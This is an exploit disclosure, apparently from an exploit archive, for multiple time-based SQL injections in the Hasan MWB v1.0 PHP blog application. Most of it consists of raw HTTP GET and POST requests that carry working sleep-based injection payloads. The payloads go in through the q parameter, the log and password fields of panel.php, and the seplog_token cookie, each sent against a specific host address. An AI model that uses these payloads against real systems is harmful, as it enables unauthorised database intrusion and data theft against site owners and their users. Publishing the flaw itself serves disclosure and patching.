=================================================== Hasan MWB v1.0 - Multiple Time-Based SQL Injections =================================================== ____________________________________________________________________________________ # Exploit Title: Hasan MWB v1.0 - Multiple Time-Based SQL Injections # Date: [12-04-2018] # Category: Webapps ____________________________________________________________________________________ # Author: Socket_0x03 (Alvaro J. Gene) # Email: Socket_0x03 (at) teraexe (dot) com # Website: www.teraexe.com ____________________________________________________________________________________ # Software Link: https://sourceforge.net/projects/hasanmwb # Vulnerable Application: Hasan MWB # Version: 1.0 # Vulnerable File: panel.php # Parameters: q, log, and password # Language: This application is available in Indonesian language. # Product Description: Hasan MSB is an application that a webmaster can use to create a blog. In this app, an administrator can use different kinds of features, such as a login panel. ____________________________________________________________________________________ # Multiple Time-Based SQL Injections -1. Parameter: q http://www.website.com/?q=%2c(select*from(select(sleep(20)))a) GET /hasan/?q=%2c(select*from(select(sleep(20)))a) HTTP/1.1 Host: 75.84.96.178 User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://75.84.96.178/hasan/ Connection: close Cookie: seplog_token=obsolete; PHPSESSID=ekmvdnag3a0vg03l0aocsun5q2 Upgrade-Insecure-Requests: 1 -2. File: panel.php Parameter: log POST /hasan/panel.php HTTP/1.1 Host: 75.84.96.178 User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://75.84.96.178/hasan/panel.php Content-Type: application/x-www-form-urlencoded Content-Length: 26 Connection: close Cookie: seplog_token=obsolete; PHPSESSID=ekmvdnag3a0vg03l0aocsun5q2 Upgrade-Insecure-Requests: 1 log='%2b(select*from(select(sleep(20)))a)%2b'&password=&login=Masuk -3. File: panel.php Parameter: password POST /hasan/panel.php HTTP/1.1 Host: 75.84.96.178 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Referer: http://75.84.96.178/hasan/panel.php Content-Type: application/x-www-form-urlencoded Content-Length: 34 Cookie: seplog_token=obsolete; PHPSESSID=ekmvdnag3a0vg03l0aocsun5q2 password=%2c(select*from(select(sleep(20)))a)&log=&login=login%3dMasuk -4. File panel.php Cookie: seplog_token GET /hasan/panel.php HTTP/1.1 Host: 75.84.96.178 User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: seplog_token=obsolete%2c(select*from(select(sleep(20)))a); PHPSESSID=ekmvdnag3a0vg03l0aocsun5q2 Upgrade-Insecure-Requests: 1